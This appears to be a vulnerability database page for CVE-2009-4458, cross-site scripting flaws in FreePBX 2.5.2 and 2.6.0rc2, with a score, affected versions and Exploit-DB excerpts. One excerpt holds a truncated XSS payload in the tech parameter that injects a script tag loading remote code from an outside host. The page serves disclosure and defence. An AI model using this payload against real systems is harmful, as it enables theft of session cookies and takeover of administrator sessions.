CVE-2009-4458
published 2009-12-30CVE-2009-4458: Multiple cross-site scripting (XSS) vulnerabilities in FreePBX 2.5.2 and 2.6.0rc2, and possibly other versions, allow remote attackers to inject arbitrary web…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.85%
76.4th percentile
Multiple cross-site scripting (XSS) vulnerabilities in FreePBX 2.5.2 and 2.6.0rc2, and possibly other versions, allow remote attackers to inject arbitrary web script or HTML via the (1) tech parameter to admin/admin/config.php during a trunks display action, the (2) description parameter during an Add Zap Channel action, and (3) unspecified vectors during an Add Recordings action.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freepbx | freepbx | — | — |
| freepbx | freepbx | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FreePBX 2.5.2 - Zap Channel Addition Description Parameter Cross-Site Scripting
exploitdb·2009-12-28
CVE-2009-4458 FreePBX 2.5.2 - Zap Channel Addition Description Parameter Cross-Site Scripting
FreePBX 2.5.2 - Zap Channel Addition Description Parameter Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/37482/info
FreePBX is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
FreePBX 2.5.2 is vulnerable; other versions may also be affected.
Add Channel
Channel:The Zap Channel number to map to a DID
Description:A useful description describing this channel
DID:Th
Exploit-DB
FreePBX 2.5.2 - '/admin/config.php?tech' Cross-Site Scripting
exploitdb·2009-12-28
CVE-2009-4458 FreePBX 2.5.2 - '/admin/config.php?tech' Cross-Site Scripting
FreePBX 2.5.2 - '/admin/config.php?tech' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/37482/info
FreePBX is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
FreePBX 2.5.2 is vulnerable; other versions may also be affected.
location.href='https://www.example.com/admin/admin/config.php?display=trunks&tech=%3C/script%3E%20%22%3E
%3Cscript%20src%3Dhttp%3A//global-evol
Exploit-DB
PBX Phone System 2.x - Multiple Vulnerabilities
exploitdb·2009-12-24
CVE-2009-4458 PBX Phone System 2.x - Multiple Vulnerabilities
PBX Phone System 2.x - Multiple Vulnerabilities
---
PenTest Information:
Global-Evolution Security Team (~remove) discover multiple Vulnerabilities on PBX Phone System Application.
An attacker can get sensitive customer/admin session-data over multiple Cross-Site-Scripting vulnerabilities.
Details
Tested on OS: Windows 7 VBox
Tested with Software: Mozilla Firefox 3.5.x (Portable|Mod)
Vulnerable Products: PBX Business Phone Application
Affected Versions: v2.6.x & 2.5.2.x
Vulnerability Type: Multiple Cross Site Scripting (Server-Side & Client-Side)
Security-Risk: Low & Medium (1.1 & 1.2)
Vendor-URL: http://www.freepbx.org/
Source-URL: http://www.freepbx.org/download-freepbx
Vendor-Status: Not Informed
Patch/Fix-Status: Fixed version not released
Advisory-Status: Published | 25.12.2009
No writeups or analysis indexed.
http://osvdb.org/61357http://osvdb.org/61358http://secunia.com/advisories/37972http://www.exploit-db.com/exploits/10645http://www.securityfocus.com/bid/37482https://exchange.xforce.ibmcloud.com/vulnerabilities/55053https://exchange.xforce.ibmcloud.com/vulnerabilities/55054http://osvdb.org/61357http://osvdb.org/61358http://secunia.com/advisories/37972http://www.exploit-db.com/exploits/10645http://www.securityfocus.com/bid/37482https://exchange.xforce.ibmcloud.com/vulnerabilities/55053https://exchange.xforce.ibmcloud.com/vulnerabilities/55054
2009-12-30
Published